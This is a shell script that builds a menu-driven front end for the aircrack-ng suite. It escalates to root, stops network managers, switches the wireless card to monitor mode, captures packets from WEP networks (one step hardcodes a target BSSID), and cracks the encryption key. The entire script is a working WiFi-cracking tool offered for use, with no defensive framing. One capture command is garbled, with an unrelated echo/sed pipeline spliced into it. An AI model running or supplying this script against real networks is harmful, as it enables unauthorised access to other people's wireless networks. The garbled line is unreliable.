#!/bin/sh

TERM=xterm
alias dmenu='dmenu -nb "#333" -nf "#ccc" -sb "#111" -sf "#ff0"'

WLANI=$(echo /proc/sys/net/ipv4/conf/w* | sed "s%.*/%%")

# Only root may pass
[ $USER = root ] || {
    sudo $0
    exit
}


hash airmon-ng 2>/dev/null || {
    cat<<EOF | xmessage -file -
Aircrack-ng suite not installed.
You'll also need aircrack-ng-scripts package and a compatible wireless card.
EOF
    exit 1
}

step() {
    cmd=$(dmenu -l 4 -p "$1")
    [ -z "$cmd" ] || $TERM -e sh -c "$cmd;echo Press any key..;read"
}

#############

iwlist $WLANI scan | xmessage -file -

cat <<EOF | step '1. Check (and kill) programs that could interfere with the wireless card'
sudo /etc/rc.d/wicd stop; sudo /etc/rc.d/networkmanager stop; sudo pkill wpa_; sudo airmon-ng check kill
sudo airmon-ng check kill
sudo airmon-ng check
exit # skip this step
EOF

cat <<EOF | step '2. Turn card into monitor mode (optional specific channel)'
sudo airmon-ng stop mon0; sudo airmon-ng start $WLANI
sudo airmon-ng start $WLANI
sudo airmon-ng start $WLANI 2
sudo airmon-ng start $WLANI 6
exit # skip this step
EOF

cat <<EOF | step '3. Get packets with airodump-ng (keep terminal open)' &
sudo airodump-ng mon0 -w ./wificrack --ivs --encrypt WEP  # only WEP
sudo airodump-ng mon0 -w ./wificrackecho /proc/sys/net/ipv4/conf/w* | sed "s%.*/%%"
sudo airodump-ng mon0 -w ./wificrack --ivs -c 11 --bssid 00:01:E3:08:4C:9D
exit # skip this step
EOF

# wait for dmenu to finish before we can launch it again
while pidof dmenu > /dev/null
do sleep 0.5
done

sleep 3s # also wait for some packets

cat <<EOF | step '4. Use collected packets to crack the encryption'
aircrack-ng ./wificrack*.ivs -f 100 # WEP increased tries (if low number of IV)
aircrack-ng ./wificrack*.ivs # WEP
exit
EOF





